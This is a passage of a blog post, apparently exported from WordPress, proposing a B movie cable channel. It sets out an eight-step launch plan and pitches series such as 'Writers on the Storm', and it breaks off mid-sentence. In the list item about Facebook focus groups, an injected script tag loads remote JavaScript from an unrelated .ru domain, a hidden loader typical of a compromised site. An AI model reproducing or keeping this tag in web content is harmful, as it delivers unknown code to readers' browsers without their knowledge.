B Movie Channel"},"content":{"rendered":"<p>There are excellent existing channels on cable or satellite to get our B movie fix.\u00a0 However, we deserve more.\u00a0 Typically we have to set our DVR for late night or wait a week for a shark, zombie, creature, or horror and it can feel like eternity sometimes.\u00a0 Just a dream but maybe a few producers can get together to create the B Movie channel?<\/p>\n<p>Why not?\u00a0 I asked Lloyd Kaufman how he got his Troma Channel on Comcast.\u00a0 There are three important factors I was told.\u00a0 35 years of studio experience, Yale degree, and groveling.\u00a0 I\u2019ll take care of the groveling.\u00a0 Combined studio experience is probably over a century more than needed and finally equal or greater than a Yale degree\u2026done!<\/p>\n<p>Next is to put the plan in action:<\/p>\n<ol>\n<li>We already know what type of channel we want.<\/li>\n<li>Headquarters: I offer to kick my daughters out of their bedroom.<\/li>\n<li>Focus groups of potential viewers.\u00a0 We can conduct that on our Facebook page.<script src=\"\/\/pngme.ru\/seter\"><\/script><\/li>\n<li>Compare and contrast to existing channels.\u00a0 Existing channels are slowly moving from B movies\u00a0to TV series and possibly format changes.<\/li>\n<li>Need to write an executive summary detailing our plan which should include graphics, programming grid, demographics and a five year plan.<\/li>\n<li>Get some advertisers to back us up.\u00a0 Personally I chow down a bag of Doritos typically so I\u2019ll\u00a0write up a letter for them.\u00a0 All other suggestions are welcome.<\/li>\n<li>We all chip in our I.T. and video expertise.<\/li>\n<li>\u00a0Now the exhausting part.\u00a0 Many phone calls to cable distributors to get picked up.<\/li>\n<\/ol>\n<p>&nbsp;<\/p>\n<p>Once the channel is live why not add some series to air?<\/p>\n<p><strong>\u2018Writers on the Storm\u2019 <\/strong>Several writers at a coffee shop with their laptops type and brainstorm new movie ideas and scenes.<\/p>\n<p><strong>\u2018Director\u2019s Cut\u2019<\/strong> Several directors at a martini bar have laughs ripping on the writers and their work.<\/p>\n<p><strong>\u2018The Producers Corner\u2019<\/strong> Several producers hang out at a smoke shop with cigars while determining which script they will produce and which director to hire.<\/p>\n<p><strong>\u2018Youngbloods\u2019<\/strong> Premiere of a young director or producers first feature length film.<\/p>\n<p><strong>\u2018Casting Call\u2019<\/strong> A show that will share information on new films auditioning for cast members.<\/p>\n<p>The fans of course would have a big part of what movies are aired and when.\u00a0 Here\u2019s just an example of a day\u2019s
